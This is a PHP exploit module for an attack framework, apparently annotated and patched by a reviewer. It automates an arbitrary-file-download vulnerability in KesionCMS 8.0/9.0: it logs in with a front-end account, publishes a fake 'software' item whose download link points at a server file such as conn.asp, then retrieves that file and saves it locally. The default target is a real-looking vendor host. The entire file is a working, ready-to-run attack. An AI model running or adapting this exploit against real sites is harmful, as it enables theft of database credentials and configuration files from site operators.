<?php

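/**
 * KesionCMS >= 8.0 / 9.0 "arbitrary download" module.
 *
 * Chain (each step calls the next): run() -> tjwj4() [front-end login] ->
 * tjwj() [publish a "software" item whose download URL is the target file]
 * -> tjwj2() [read back the item id] -> tjwj3() [fetch it through
 * item/downLoad.asp and save it locally].
 *
 * `G()`, `msg()` and `HTTP::GET()` are supplied by the host framework and are
 * not defined here; HTTP::GET is assumed to return the raw response (headers
 * included, since tjwj4() greps Set-Cookie out of it) — confirm against the
 * framework before changing the parsing below.
 */
class kesion8x_9x{

    /**
     * Module descriptor: author/title/reference plus the editable options —
     * target host/path/port, the server-side file to fetch (`xiafile`), a
     * registered front-end account, and the ClassID of a channel-3 category
     * (`自动获取` = resolve it from /plus/rss.asp at run time).
     */
    public function info(){
        $info=array(
            'info'=>array(
                'author'=>'鬼哥',
                'title'=>'kesionCMS >=8.0 9.0 任意下载漏洞',
                'info'=>'https://forum.90sec.org/thread-3874-1-1.html'
            ),
            'option'=>array(
                'host'=>'bbs.kesion.com',
                'path'=>'/',
                'port'=>'80',
                'xiafile'=>'conn.asp',
                'user'=>'tttttt',
                'pass'=>'tttttt',
                'classid'=>'自动获取'
            )
        );
        return $info;
    }

    /**
     * Step 2: publish a "software" item under $classids whose download link
     * is DownUrls=/<xiafile>, authenticated with the session cookie $coo.
     *
     * A redirect back to the add form ('Action=Add&ClassID=' in the body)
     * means the item was created; '系统设定不能在此栏目发表' means members may
     * not post in that category, so a different ClassID is needed.
     */
    public function tjwj($classids,$coo)
    {
        $query = 'user/User_MySoftWare.asp?action=AddSave&channelid=3&ClassID='.$classids
               .'&Title=aaniu&DownUrls=/'.G('xiafile');
        $data = HTTP::GET(G('host'), G('path').$query, $coo, '');

        if (strpos($data,'Action=Add&ClassID=') !== false) {
            $this->tjwj2($coo);
        } elseif (strpos($data,'系统设定不能在此栏目发表') !== false) {
            msg('classid='.$classids.' 错误,请手动到/plus/rss.asp获取',1);
        } else {
            msg('soft publish fail',1);
        }
    }

    /**
     * Step 3: list the account's channel-3 items and take the first
     * value="..." attribute as the id of the item just published.
     */
    public function tjwj2($coo)
    {
        $data = HTTP::GET(G('host'), G('path').'user/User_ItemInfo.asp?ChannelID=3', $coo, '');

        // Fix: the original indexed $arr[1] whenever 'value=' appeared anywhere
        // in the page, even if the quoted-attribute regex did not match
        // (undefined offset). Gate on the match itself.
        if (preg_match('/value=\"(.+?)\"/', $data, $arr) === 1) {
            $this->tjwj3($arr[1]);
        } else {
            msg('Get Download address error',1);
        }
    }

    /**
     * Step 4: request the item's download (downLoad.asp streams the file the
     * DownUrls link points at) and save the body to the working directory.
     */
    public function tjwj3($id)
    {
        $referer = 'http://'.G('host').G('path');
        $data = HTTP::GET(G('host'), G('path').'item/downLoad.asp?m=3&downid=1&id='.$id, '', $referer);

        // Fix: `xiafile` is the *remote* path (e.g. include/conn.asp); the
        // original reused it verbatim as the local path, so a subdirectory or
        // '../' in the option either failed the fopen() (then fwrite(false)
        // fatals) or wrote outside the working directory. Keep the basename only.
        $local = basename(G('xiafile'));
        if ($local === '' || $local === '.' || $local === '..') {
            msg('invalid xiafile: '.G('xiafile'),1);
            return;
        }
        if (file_put_contents($local, $data) === false) {
            msg('write '.$local.' fail',1);
            return;
        }
        msg(G('xiafile') . ': successfully downloaded',1);

        // The original ran system("start " . $file): an unescaped shell
        // command on every platform, which also hands a file fetched from the
        // target to the local file-type handler. Keep the convenience only on
        // Windows (where `start` exists), with the argument quoted and an
        // explicit empty window title so the quoted name is not taken as one.
        // Consider dropping this entirely when targeting hosts you do not trust.
        if (stripos(PHP_OS, 'WIN') === 0 && file_exists($local)) {
            system('start "" '.escapeshellarg($local));
        }
    }

    /**
     * Step 1: log in to the front end with the configured user/pass and pass
     * the session cookie on to tjwj() together with the chosen ClassID.
     * 'RndPassword=' in the response marks a successful login.
     */
    public function tjwj4($classids)
    {
        // Fix: the credentials were spliced into the query string raw; a '&',
        // '#', '%' or space in either would silently have changed the request.
        $login = 'user/CheckUserLogin.asp?Username='.rawurlencode(G('user'))
               .'&Password='.rawurlencode(G('pass'));
        $data = HTTP::GET(G('host'), G('path').$login, '', '');

        if (strpos($data,'RndPassword=') === false
            || preg_match('/Set-Cookie: (.*)/', $data, $arr) !== 1) {
            msg('user '.G('user').' login fail',1);
            return;
        }

        // NOTE(review): only the first Set-Cookie header is captured and its
        // attributes (path=, expires=, ...) are echoed back verbatim; confirm
        // the target accepts that before relying on it.
        $cookie = str_replace(array("\r\n", "\n", "\r"), '', $arr[1]);
        $this->tjwj($classids, $cookie);
    }

    /**
     * Module entry point. Resolves the ClassID from /plus/rss.asp when the
     * option is left at `自动获取` (first `classid=...&` in the feed),
     * otherwise uses the configured value, then starts the chain at tjwj4().
     */
    public function run(){
        if (G('classid') === '自动获取') {
            $data = HTTP::GET(G('host'), G('path').'plus/rss.asp', '', '');

            // Fix: guard the capture instead of assuming strpos() implies a match.
            if (strpos($data,'?classid=') !== false
                && preg_match('/classid=(.+?)&/', $data, $arr) === 1) {
                $this->tjwj4($arr[1]);
            } else {
                msg('Get classid fail',1);
            }
        } else {
            $this->tjwj4(G('classid'));
        }
    }

}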

?>